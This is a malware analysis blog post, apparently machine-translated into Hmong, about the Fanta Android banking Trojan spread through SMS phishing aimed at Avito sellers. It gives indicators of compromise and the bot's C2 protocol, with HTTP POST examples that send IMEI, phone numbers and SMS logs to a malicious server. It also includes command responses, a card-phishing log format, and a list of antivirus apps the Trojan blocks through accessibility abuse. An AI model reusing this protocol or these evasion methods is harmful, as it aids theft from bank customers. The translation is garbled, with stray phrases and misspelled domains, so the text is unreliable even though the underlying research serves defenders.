ProHoster > Блог > xov xwm hauv internet > Leysya, Fanta: lub tswv yim tshiab rau Android Trojan qub

Leysya, Fanta: lub tswv yim tshiab rau Android Trojan qub

Leysya, Fanta: lub tswv yim tshiab rau Android Trojan qub

Ib hnub koj xav muag ib yam dab tsi ntawm Avito thiab, tau tshaj tawm cov lus piav qhia ntawm koj cov khoom (piv txwv li, RAM module), koj yuav tau txais cov lus no:

Leysya, Fanta: lub tswv yim tshiab rau Android Trojan qubThaum koj qhib qhov txuas, koj yuav pom ib nplooj ntawv zoo li tsis muaj nuj nqis ceeb toom rau koj, tus neeg muag khoom zoo siab thiab ua tiav, tias kev yuav khoom tau ua tiav:

Leysya, Fanta: lub tswv yim tshiab rau Android Trojan qub
Thaum koj nias lub pob "Ntxiv mus", cov ntaub ntawv APK nrog lub cim thiab lub npe ntseeg siab yuav raug rub tawm rau koj lub cuab yeej Android. Koj tau nruab ib daim ntawv thov uas yog vim li cas thov AccessibilityService txoj cai, ces ob peb lub qhov rais tshwm thiab sai sai ploj thiab ... Qhov ntawd yog nws.

Koj mus xyuas koj qhov nyiaj tshuav, tab sis qee qhov laj thawj koj lub txhab nyiaj app nug txog koj daim npav cov ntsiab lus dua. Tom qab nkag mus rau cov ntaub ntawv, ib yam dab tsi txaus ntshai tshwm sim: rau qee qhov laj thawj tseem tsis meej rau koj, nyiaj pib ploj ntawm koj tus account. Koj tab tom sim daws qhov teeb meem, tab sis koj lub xov tooj tawm tsam: nws nias lub "Rov qab" thiab "Tsev" cov yawm sij, tsis tua thiab tsis tso cai rau koj qhib kev ntsuas kev nyab xeeb. Raws li qhov tshwm sim, koj tshuav tsis muaj nyiaj, koj cov khoom tsis tau yuav, koj tsis meej pem thiab xav tias: ua li cas?

Cov lus teb yog yooj yim: koj tau dhau los ua neeg raug tsim txom ntawm Android Trojan Fanta, ib tug tswv cuab ntawm tsev neeg Flexnet. Qhov no tshwm sim li cas? Cia peb piav tam sim no.

Tus sau phau ntawv: Andrey Polovinkin: XNUMX Lab tus kiv cua tos koj rau Webtalk!, junior tshwj xeeb hauv malware tsom xam, Ivan Pisarev, tus kws tshaj lij hauv kev txheeb xyuas malware.

Qee cov txheeb cais

Flexnet tsev neeg ntawm Android Trojans thawj zaug tau paub rov qab rau xyoo 2015. Nyob rau lub sijhawm ntev ntawm kev ua ub no, tsev neeg tau nthuav dav mus rau ntau yam subspecies: Fanta, Limebot, Lipton, thiab lwm yam. Lub Trojan, nrog rau cov txheej txheem cuam tshuam nrog nws, tsis txhob nyob twj ywm: cov txheej txheem kev faib tawm tshiab tau tsim tawm - hauv peb cov ntaub ntawv, cov nplooj ntawv phishing zoo tsom rau cov neeg siv-muag tshwj xeeb, thiab Trojan cov neeg tsim khoom ua raws li cov qauv tsim hauv tus kab mob sau ntawv - ntxiv kev ua haujlwm tshiab uas ua rau nws muaj peev xwm nyiag tau nyiaj ntau dua los ntawm cov cuab yeej muaj kab mob thiab hla cov txheej txheem tiv thaiv.

Cov phiaj xwm tau piav qhia hauv tsab xov xwm no yog tsom rau cov neeg siv los ntawm Russia; qee tus lej ntawm cov kab mob kis tau raug kaw hauv Ukraine, thiab txawm tias tsawg dua hauv Kazakhstan thiab Belarus.

Txawm hais tias Flexnet tau nyob hauv Android Trojan arena rau ntau dua 4 xyoo tam sim no thiab tau kawm paub meej los ntawm ntau tus kws tshawb fawb, nws tseem nyob hauv qhov zoo. Pib txij Lub Ib Hlis 2019, qhov peev xwm ntawm kev puas tsuaj yog ntau dua 35 lab rubles - thiab qhov no tsuas yog rau kev sib tw hauv Russia. Nyob rau hauv 2015, ntau yam versions ntawm no Android Trojan tau muag nyob rau hauv underground forums, qhov twg lub hauv paus code ntawm Trojan nrog ib tug ncauj lus kom ntxaws piav qhia kuj yuav nrhiav tau. Qhov no txhais tau hais tias cov txheeb cais ntawm kev puas tsuaj hauv ntiaj teb yog qhov tseem ceeb dua. Tsis yog qhov taw qhia phem rau tus txiv neej laus, puas yog?

Leysya, Fanta: lub tswv yim tshiab rau Android Trojan qub

Los ntawm kev muag khoom mus rau kev dag ntxias

Raws li tuaj yeem pom los ntawm cov ntawv qhia yav dhau los ntawm nplooj ntawv phishing rau kev pabcuam hauv Is Taws Nem rau tshaj tawm kev tshaj tawm Avito, nws tau npaj rau tus neeg raug tsim txom. Pom tau tias, cov neeg tawm tsam siv ib qho ntawm Avito parsers, uas rho tawm tus xov tooj thiab lub npe ntawm tus neeg muag khoom, nrog rau cov lus piav qhia ntawm cov khoom. Tom qab nthuav cov nplooj ntawv thiab npaj cov ntaub ntawv APK, tus neeg raug tsim txom tau xa SMS nrog nws lub npe thiab txuas mus rau nplooj ntawv phishing uas muaj cov lus piav qhia ntawm nws cov khoom thiab cov nyiaj tau txais los ntawm "muag" ntawm cov khoom. Los ntawm txhaj rau ntawm lub pob, tus neeg siv tau txais cov ntaub ntawv tsis zoo APK - Fanta.

Kev tshawb fawb ntawm shcet491[.]ru sau tau pom tias nws tau raug xaiv los rau Hostinger's DNS servers:

  • ns1.hostinger.ru ua
  • ns2.hostinger.ru ua
  • ns3.hostinger.ru ua
  • ns4.hostinger.ru ua

Cov ntaub ntawv hauv cheeb tsam muaj cov ntawv nkag taw qhia rau IP chaw nyob 31.220.23[.]236, 31.220.23[.]243, thiab 31.220.23[.]235. Txawm li cas los xij, tus sau cov ntaub ntawv tseem ceeb (A cov ntaub ntawv) taw qhia rau lub server nrog IP chaw nyob 178.132.1[.]240.

IP chaw nyob 178.132.1[.]240 nyob rau hauv Netherlands thiab belongs rau tus tswv tsev WorldStream. IP chaw nyob 31.220.23[.]235, 31.220.23[.]236 thiab 31.220.23[.]243 nyob rau hauv UK thiab koom nrog sib koom hosting server HOSTINGER. Siv raws li ib tug recorder openprov-ru. Cov npe hauv qab no kuj tau txiav txim siab rau tus IP chaw nyob 178.132.1[.]240:

  • sdelka-ru [.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka [.]ru
  • shcet382 [.]ru
  • sdelka 221 [.]ru
  • sdelka 211 [.]ru
  • vyplata437 [.]ru
  • viplata 291 [.]ru
  • perevod 273 [.]ru
  • perevod 901 [.]ru

Nws yuav tsum raug sau tseg tias cov kev sib txuas hauv cov qauv hauv qab no tau muaj los ntawm yuav luag txhua qhov chaw:

http://(www.){0,1}<%domain%>/[0-9]{7}

Cov qauv no kuj suav nrog qhov txuas los ntawm SMS lus. Raws li cov ntaub ntawv keeb kwm, nws tau pom tias ib lub npe sib raug rau ntau qhov sib txuas hauv cov qauv piav qhia saum toj no, uas qhia tau hais tias ib lub npe tau siv los faib cov Trojan rau ntau tus neeg raug tsim txom.

Cia peb dhia ua ntej me ntsis: Trojan rub tawm ntawm qhov txuas los ntawm SMS siv qhov chaw nyob raws li kev tswj hwm server onusedseddohap[.]club. Cov npe no tau sau npe rau 2019-03-12, thiab pib txij 2019-04-29, APK cov ntawv thov cuam tshuam nrog lub npe no. Raws li cov ntaub ntawv tau los ntawm VirusTotal, tag nrho ntawm 109 daim ntawv thov cuam tshuam nrog lub server no. Tus sau nws tus kheej tau daws rau qhov chaw nyob IP 217.23.14[.]27, nyob hauv Netherlands thiab muaj los ntawm tus tswv tsev WorldStream. Siv raws li ib tug recorder npe. Domains kuj tau daws rau qhov chaw nyob IP no bad-racoon [.] club (pib ntawm 2018-09-25) thiab bad-racoon [.] nyob (pib 2018-10-25). Nrog domain bad-racoon [.] club ntau tshaj 80 APK cov ntaub ntawv cuam tshuam nrog bad-racoon [.] nyob - ntau tshaj 100.

Feem ntau, qhov kev tawm tsam tau nce raws li hauv qab no:

Leysya, Fanta: lub tswv yim tshiab rau Android Trojan qub

Dab tsi hauv qab Fanta lub hau?

Zoo li ntau lwm Android Trojans, Fanta muaj peev xwm nyeem ntawv thiab xa SMS, ua USSD thov, thiab tso saib nws lub qhov rais rau saum cov ntawv thov (xws li cov tuam txhab nyiaj txiag). Txawm li cas los xij, lub arsenal ntawm kev ua haujlwm ntawm tsev neeg no tau tuaj txog: Fanta pib siv AccessibilityService rau ntau lub hom phiaj: nyeem cov ntsiab lus ntawm cov ntawv ceeb toom los ntawm lwm yam kev siv, tiv thaiv kev tshawb nrhiav thiab nres qhov kev tua ntawm Trojan ntawm cov cuab yeej muaj kab mob, thiab lwm yam. Fanta ua haujlwm ntawm txhua yam ntawm Android tsis muaj hnub nyoog qis dua 4.4. Hauv tsab xov xwm no peb yuav ua tib zoo saib cov qauv hauv qab no Fanta:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Tam sim ntawd tom qab tso tawm

Tam sim ntawd tom qab tso tawm, Trojan zais nws lub cim. Daim ntawv thov tsuas tuaj yeem ua haujlwm yog tias lub npe ntawm cov cuab yeej muaj kab mob tsis nyob hauv cov npe:

  • android_x86 ua
  • Virtualbox
  • Nexus 5X (Bullhead)
  • Nexus 5 (zeeg)

Qhov kev kuaj no yog ua tiav hauv kev pabcuam tseem ceeb ntawm Trojan - MainService. Thaum tso tawm thawj zaug, daim ntawv thov kev teeb tsa tsis tau pib ua qhov tseem ceeb (hom ntawv khaws cia cov ntaub ntawv teeb tsa thiab lawv lub ntsiab lus yuav tau tham tom qab), thiab cov cuab yeej tshiab tau sau npe rau ntawm lub server tswj. HTTP POST thov nrog hom lus yuav raug xa mus rau lub server sau npe_bot thiab cov ntaub ntawv hais txog tus kab mob no (Android version, IMEI, xov tooj, tus neeg teb xov tooj lub npe thiab lub teb chaws chaws uas tus neeg teb xov tooj tau sau npe). Qhov chaw nyob ua tus tswj server hXXp://onuseseddohap[.]club/controller.php. Hauv kev teb, tus neeg rau zaub mov xa cov lus uas muaj cov teb bot_id ib, bot_pwd, neeg rau zaub mov - daim ntawv thov khaws cov txiaj ntsig no raws li qhov ntsuas ntawm CnC server. Parameter neeg rau zaub mov xaiv tau yog tias daim teb tsis tau txais: Fanta siv qhov chaw sau npe - hXXp://onuseseddohap[.]club/controller.php. Kev ua haujlwm ntawm kev hloov pauv qhov chaw nyob CnC tuaj yeem siv los daws ob qhov teeb meem: txhawm rau faib cov khoom sib npaug ntawm ob peb lub servers (yog tias muaj ntau cov khoom siv kis mob, qhov thauj khoom ntawm lub vev xaib tsis zoo tuaj yeem siab), thiab tseem siv tau. lwm tus neeg rau zaub mov hauv qhov xwm txheej tsis ua haujlwm ntawm ib qho ntawm CnC servers .

Yog tias qhov yuam kev tshwm sim thaum xa daim ntawv thov, Trojan yuav rov ua cov txheej txheem sau npe tom qab 20 vib nas this.

Thaum lub cuab yeej tau ua tiav tiav, Fanta yuav tso cov lus hauv qab no rau tus neeg siv:

Leysya, Fanta: lub tswv yim tshiab rau Android Trojan qub
Cov lus ceeb toom tseem ceeb: qhov kev pabcuam hu ua Kev ruaj ntseg - lub npe ntawm Trojan kev pabcuam, thiab tom qab nyem lub pob OK Lub qhov rais yuav qhib nrog rau Accessibility nqis ntawm cov cuab yeej muaj kab mob, qhov twg tus neeg siv yuav tsum tso cai Accessibility rau cov kev pab cuam phem:

Leysya, Fanta: lub tswv yim tshiab rau Android Trojan qub
Thaum tus neeg siv tig rau AccessibilityService, Fanta tau txais kev nkag mus rau cov ntsiab lus ntawm daim ntawv thov windows thiab cov kev ua hauv lawv:

Leysya, Fanta: lub tswv yim tshiab rau Android Trojan qub
Tam sim ntawd tom qab tau txais cov cai Accessibility, Trojan thov cov thawj coj txoj cai thiab cov cai los nyeem cov ntawv ceeb toom:

Leysya, Fanta: lub tswv yim tshiab rau Android Trojan qub
Siv AccessibilityService, daim ntawv thov simulates keystrokes, yog li muab nws tus kheej tag nrho cov cai tsim nyog.

Fanta tsim ntau qhov chaw khaws ntaub ntawv (uas yuav piav qhia tom qab) tsim nyog los khaws cov ntaub ntawv teeb tsa, nrog rau cov ntaub ntawv khaws cia hauv cov txheej txheem hais txog cov cuab yeej muaj kab mob. Txhawm rau xa cov ntaub ntawv khaws tseg, Trojan tsim ib txoj haujlwm rov qab tsim los rub cov teb los ntawm cov ntaub ntawv thiab tau txais cov lus txib los ntawm kev tswj hwm server. Lub sijhawm rau kev nkag mus rau CnC yog teem rau ntawm Android version: nyob rau hauv rooj plaub ntawm 5.1, lub sijhawm yuav yog 10 vib nas this, txwv tsis pub 60 vib nas this.

Txhawm rau tau txais cov lus txib, Fanta thov GetTask mus rau lub server tswj. Hauv kev teb, CnC tuaj yeem xa ib qho ntawm cov lus txib hauv qab no:

pab neeg piav qhia
0 Xa SMS lus
1 Hu xov tooj los yog USSD hais kom ua
2 Hloov kho qhov ntsuas luv
3 Hloov kho qhov ntsuas cuam ​​tshuam
6 Hloov kho qhov ntsuas smsManager
9 Pib sau SMS lus
11 Pib dua koj lub xov tooj mus rau lub Hoobkas nqis
12 Qhib / Disable logging ntawm dialog box creation

Fanta tseem sau cov ntawv ceeb toom los ntawm 70 lub txhab nyiaj hauv tuam txhab apps, them nyiaj ceev ceev thiab e-hnab nyiaj thiab khaws cia rau hauv cov ntaub ntawv.

Khaws configuration parameter

Txhawm rau khaws cov kev teeb tsa tsis raug, Fanta siv tus qauv mus kom ze rau Android platform - nyiam Zoo Li Cas- cov ntaub ntawv. Cov chaw yuav raug khaws cia rau hauv cov ntaub ntawv npe chaw. Cov lus piav qhia ntawm cov kev khaws cia yog nyob rau hauv cov lus hauv qab no.

lub npe Default tus nqi Muaj nuj nqis piav qhia
id 0 Integer Bot ID
neeg rau zaub mov hXXp://onuseseddohap[.]club/ URL Tswj chaw nyob server
pwd pw - txoj hlua Server password
luv 20 Integer Lub sijhawm luv. Qhia ntev npaum li cas cov haujlwm hauv qab no yuav tsum ncua sijhawm:

  • Thaum xa ib daim ntawv thov txog cov xwm txheej ntawm kev xa SMS
  • Tau txais cov lus txib tshiab los ntawm kev tswj xyuas server
cuam ​​tshuam tag nrho cov tag nrho/telNumber Yog hais tias lub teb yog sib npaug rau txoj hlua tag nrho cov los yog xov tooj, ces cov lus tau txais SMS yuav raug cuam tshuam los ntawm daim ntawv thov thiab tsis qhia rau tus neeg siv
smsManager 0 0/1 Qhib / kaw daim ntawv thov raws li tus neeg txais SMS default
nyeem Dialog cuav Tseeb / cuav Enable/Disable event logging AccessibilityEvent

Fanta kuj siv cov ntaub ntawv smsManager:

lub npe Default tus nqi Muaj nuj nqis piav qhia
pckg ua - txoj hlua Lub npe ntawm SMS tus thawj tswj hwm tau siv

Kev sib tham nrog databases

Thaum nws ua haujlwm, Trojan siv ob lub databases. Database npe a siv los khaws ntau yam ntaub ntawv sau los ntawm xov tooj. Qhov thib ob database muaj npe fanta.db thiab yog siv los txuag chaw lub luag haujlwm rau kev tsim phishing windows tsim los sau cov ntaub ntawv hais txog cov npav hauv txhab nyiaj.

Trojan siv database а khaws cov ntaub ntawv khaws tseg thiab sau koj cov haujlwm. Cov ntaub ntawv khaws cia rau hauv ib lub rooj cav. Txhawm rau tsim ib lub rooj, siv cov lus nug SQL nram qab no:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Lub database muaj cov ntaub ntawv hauv qab no:

1. Nkag mus rau qhov pib ntawm lub cuab yeej muaj kab mob nrog cov lus Lub xov tooj qhib!

2. Cov ntawv ceeb toom los ntawm daim ntawv thov. Cov lus yog generated raws li nram no template:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Cov ntaub ntawv bank card los ntawm phishing cov ntaub ntawv tsim los ntawm Trojan. Parameter VIEW_NAME tej zaum yuav yog ib qho ntawm cov hauv qab no:

  • AliExpress
  • Avito
  • Google ua si
  • Lwm yam <%App Name%>

Cov lus nkag rau hauv hom:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Cov lus xa tuaj / tawm SMS hauv hom:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Cov ntaub ntawv hais txog lub pob uas tsim lub dialog box hauv hom:

(<%Package name%>)<%Package information%>

Piv txwv rooj cav:

Leysya, Fanta: lub tswv yim tshiab rau Android Trojan qub
Ib qho ntawm kev ua haujlwm ntawm Fanta yog sau cov ntaub ntawv hais txog cov npav hauv txhab nyiaj. Kev sau cov ntaub ntawv tshwm sim los ntawm kev tsim phishing windows thaum qhib cov ntawv thov nyiaj txiag. Lub Trojan tsim lub qhov rais phishing nkaus xwb ib zaug. Cov ntaub ntawv uas lub qhov rais tau qhia rau tus neeg siv tau muab cia rau hauv ib lub rooj chaw hauv cov chaw khaws ntaub ntawv fanta.db. Txhawm rau tsim cov ntaub ntawv, siv cov lus nug SQL nram qab no:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Tag nrho cov rooj teb chaw los ntawm kev pib pib rau 1 (tsim lub qhov rai phishing). Tom qab tus neeg siv nkag mus rau lawv cov ntaub ntawv, tus nqi yuav raug teem rau 0. Piv txwv ntawm cov lus teb chaw:

  • can_login - daim teb yog lub luag haujlwm rau kev nthuav tawm daim ntawv thaum qhib daim ntawv thov nyiaj txiag
  • first_bank - tsis siv
  • can_avito - daim teb yog lub luag haujlwm rau kev nthuav tawm daim ntawv thaum qhib daim ntawv thov Avito
  • can_ali - daim teb yog lub luag haujlwm rau kev nthuav tawm daim ntawv thaum qhib daim ntawv thov Aliexpress
  • can_lwm - daim teb yog lub luag haujlwm rau kev nthuav tawm daim ntawv thaum qhib ib daim ntawv thov los ntawm cov npe: Yula, Pandao, Drom Auto, Hnab. Cov luv nqi thiab nyiaj ntxiv phaib, Aviasales, Booking, Trivago
  • can_card - daim teb yog lub luag haujlwm rau kev nthuav tawm daim ntawv thaum qhib Google ua si

Kev cuam tshuam nrog kev tswj hwm server

Kev sib cuam tshuam hauv lub network nrog rau kev tswj hwm server tshwm sim ntawm HTTP raws tu qauv. Txhawm rau ua haujlwm nrog lub network, Fanta siv lub tsev qiv ntawv Retrofit nrov. Cov lus thov raug xa mus rau: hXXp://onuseseddohap[.]club/controller.php. Qhov chaw nyob server tuaj yeem hloov pauv thaum sau npe ntawm lub server. Cov ncuav qab zib tuaj yeem raug xa tawm los ntawm lub server. Fanta ua cov lus thov hauv qab no rau lub server:

  • Kev tso npe ntawm bot ntawm tus tswj server tshwm sim ib zaug, thaum thawj zaug tso tawm. Cov ntaub ntawv hauv qab no hais txog tus kab mob no raug xa mus rau lub server:
    · kua nplaum uas - ncuav qab zib tau txais los ntawm lub server (default value is an empty string)
    · hom - txoj hlua tsis tu ncua sau npe_bot
    · ua ntej - integer tsis tu ncua 2
    · version_sdk - yog tsim raws li cov qauv hauv qab no: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei - IMEI ntawm tus kab mob ntaus ntawv
    · lub teb chaws - code ntawm lub teb chaws uas tus neeg teb xov tooj tau sau npe, hauv ISO hom
    · tooj - xov tooj
    · neeg teb xov tooj - tus neeg ua haujlwm npe

    Ib qho piv txwv ntawm kev thov xa mus rau lub server:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Hauv kev teb rau qhov kev thov, tus neeg rau zaub mov yuav tsum xa cov khoom JSON uas muaj cov hauv qab no tsis:
    · bot_id - Tus ID ntawm tus kab mob. Yog tias bot_id sib npaug rau 0, Fanta yuav rov ua dua qhov kev thov.
    bot_pwd - password rau lub server.
    server - tswj chaw nyob server. Kev xaiv parameter. Yog tias qhov ntsuas tsis tau teev tseg, qhov chaw nyob khaws tseg hauv daim ntawv thov yuav raug siv.

    Piv txwv li JSON khoom:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Thov kom tau txais cov lus txib los ntawm lub server. Cov ntaub ntawv hauv qab no raug xa mus rau lub server:
    · kua nplaum uas - ncuav qab zib tau txais los ntawm lub server
    · twv - ID ntawm lub cuab yeej muaj tus kab mob uas tau txais thaum xa daim ntawv thov sau npe_bot
    · pwd pw -password rau lub server
    · divice_admin - daim teb txiav txim seb puas muaj cai tswj hwm tau txais. Yog tias tus thawj tswj hwm txoj cai tau txais, daim teb yog sib npaug 1, txwv tsis pub 0
    · VR - Kev Pabcuam Kev Pabcuam Kev Ua Haujlwm raws li txoj cai. Yog tias qhov kev pabcuam tau pib, tus nqi yog 1, txwv tsis pub 0
    · SMSManager - qhia seb puas yog Trojan tau ua haujlwm raws li daim ntawv thov ua ntej tau txais SMS
    · screen - qhia tias lub xeev qhov screen nyob hauv. Tus nqi yuav raug teeb tsa 1, yog tias qhov screen yog nyob rau, txwv tsis pub 0;

    Ib qho piv txwv ntawm kev thov xa mus rau lub server:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Nyob ntawm qhov hais kom ua, tus neeg rau zaub mov tuaj yeem xa rov qab ib qho khoom JSON nrog qhov sib txawv:

    · pab neeg Xa SMS lus: Cov tsis muaj tus xov tooj, cov ntawv ntawm SMS thiab tus ID ntawm cov lus xa. Tus cim yog siv thaum xa lus mus rau lub server nrog hom setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · pab neeg Hu xov tooj los yog USSD hais kom ua: Tus xov tooj lossis cov lus txib tuaj rau hauv lub cev teb. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · pab neeg Hloov lub caij nyoog parameter. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · pab neeg Hloov kev cuam tshuam parameter. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · pab neeg Hloov SmsManager teb. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · pab neeg Sau SMS lus los ntawm ib tug kab mob.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · pab neeg Pib dua koj lub xov tooj mus rau lub Hoobkas nqis: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · pab neeg Hloov ReadDialog parameter. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Xa lus nrog hom setSmsStatus. Qhov kev thov no yog ua tom qab ua tiav cov lus txib Xa SMS lus. Qhov kev thov zoo li no:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Uploading cov ntsiab lus database. Ib kab yog kis rau ib qho kev thov. Cov ntaub ntawv hauv qab no raug xa mus rau lub server:
    · kua nplaum uas - ncuav qab zib tau txais los ntawm lub server
    · hom - txoj hlua tsis tu ncua setSaveInboxSms
    · twv - ID ntawm lub cuab yeej muaj tus kab mob uas tau txais thaum xa daim ntawv thov sau npe_bot
    · ntawv nyeem - cov ntawv hauv cov ntaub ntawv khaws cia tam sim no (thaj chaw d los ntawm lub rooj cav hauv cov chaw khaws ntaub ntawv а)
    · tooj - lub npe ntawm cov ntaub ntawv khaws cia tam sim no (thaj chaw p los ntawm lub rooj cav hauv cov chaw khaws ntaub ntawv а)
    · sms_mode - integer tus nqi (tej m los ntawm lub rooj cav hauv cov chaw khaws ntaub ntawv а)

    Qhov kev thov zoo li no:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Yog tias ua tiav xa mus rau lub server, kab yuav raug tshem tawm ntawm lub rooj. Piv txwv ntawm JSON khoom xa rov qab los ntawm server:

    {
    "response":[],
    "status":"ok"
}

Sib tham nrog AccessibilityService

AccessibilityService tau siv los ua kom cov khoom siv hauv Android yooj yim siv rau cov neeg tsis taus. Feem ntau, kev sib cuam tshuam ntawm lub cev yuav tsum muaj kev cuam tshuam nrog kev thov. AccessibilityService tso cai rau koj ua lawv li programmatically. Fanta siv cov kev pabcuam los tsim cov qhov rais cuav hauv kev siv nyiaj hauv tuam txhab nyiaj thiab tiv thaiv cov neeg siv los ntawm kev qhib qhov system thiab qee qhov kev siv.

Siv cov kev ua haujlwm ntawm AccessibilityService, Trojan saib xyuas kev hloov pauv rau cov ntsiab lus ntawm lub vijtsam ntawm cov cuab yeej muaj kab mob. Raws li tau piav qhia yav dhau los, Fanta nqis muaj qhov ntsuas lub luag haujlwm rau kev txiav txim siab ua haujlwm nrog lub thawv sib tham - nyeem Dialog. Yog tias qhov ntsuas no tau teeb tsa, cov ntaub ntawv hais txog lub npe thiab cov lus piav qhia ntawm pob uas ua rau muaj qhov tshwm sim yuav raug ntxiv rau hauv cov ntaub ntawv. Trojan ua cov haujlwm hauv qab no thaum cov xwm txheej tshwm sim:

  • Simulates nias lub khawm rov qab thiab lub tsev hauv cov xwm txheej hauv qab no:
    · yog tias tus neeg siv xav reboot nws lub cuab yeej
    · yog tias tus neeg siv xav rho tawm daim ntawv thov "Avito" lossis hloov txoj cai nkag
    · Yog hais tias muaj ib qho kev hais txog "Avito" daim ntawv thov ntawm nplooj ntawv
    · thaum qhib Google Play Protect daim ntawv thov
    · thaum qhib nplooj ntawv nrog AccessibilityService nqis
    · thaum lub System Security dialog box tshwm
    · thaum qhib nplooj ntawv nrog rau "Draw dua lwm app" nqis
    · thaum qhib nplooj ntawv "Applications", "Rov qab thiab rov pib dua", "Data reset", "Reset settings", "Developer panel", "Special. Cov sijhawm tshwj xeeb", "Special rights"
    · yog tias qhov xwm txheej tau tsim los ntawm qee yam kev siv.

    Daim ntawv thov

    • hauv xov tooj ntawd
    • Master Lite
    • Ntxuav tus ascas
    • Clean Master rau x86 CPU
    • Meizu Application Permission Management
    • MIUI Security
    • Clean Master - Antivirus & Cache thiab khib nyiab Cleaner
    • Kev tswj hwm niam txiv thiab GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast antivirus & tiv thaiv dawb 2019
    • Mobile Security MegaFon
    • AVG tiv thaiv rau Xperia
    • Mobile Security
    • Malwarebytes Antivirus & Kev Tiv Thaiv
    • Antivirus rau Android 2019
    • Kev Ruaj Ntseg Master - Antivirus, VPN, AppLock, Booster
    • AVG antivirus rau Huawei ntsiav tshuaj System Manager
    • Samsung Accessibility
    • Samsung Smart Manager
    • Tus Tswv Qhia Nyab Xeeb
    • Ceev Koob
    • Dr. Web
    • Dr.Web Qhov Chaw Ruaj Ntseg
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus & Txhab Nyiaj Txiag
    • Kaspersky Internet Security: Antivirus thiab Kev Tiv Thaiv
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - kev tiv thaiv thiab kev tswj hwm
    • AVG Antivirus dawb 2019 - Kev Tiv Thaiv rau Android
    • Antivirus Hauv
    • Norton Mobile Security thiab Antivirus
    • Antivirus, firewall, VPN, kev ruaj ntseg mobile
    • Mobile Security: antivirus, VPN, tiv thaiv tub sab
    • Antivirus rau Android

  • Yog tias tau thov kev tso cai thaum xa SMS rau tus lej luv, Fanta simulates nyem rau ntawm lub checkbox Nco ntsoov xaiv thiab khawm xa.
  • Thaum koj sim tshem tawm cov cai tswj hwm los ntawm Trojan, nws kaw lub xov tooj screen.
  • Tiv thaiv kev ntxiv cov thawj coj tshiab.
  • Yog tias daim ntawv thov antivirus dr web kuaj pom kev hem, Fanta imitates nias lub khawm tsis quav ntsej.
  • Lub Trojan simulates nias lub nraub qaum thiab lub tsev khawm yog tias qhov kev tshwm sim tau tsim los ntawm daim ntawv thov Samsung Device Care.
  • Fanta tsim phishing windows nrog cov ntaub ntawv nkag mus rau cov ntaub ntawv hais txog cov npav hauv txhab nyiaj yog tias daim ntawv thov los ntawm cov npe ntawm 30 qhov kev pabcuam hauv Is Taws Nem sib txawv tau pib. Ntawm lawv: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, thiab lwm yam.

    Phishing cov ntawv

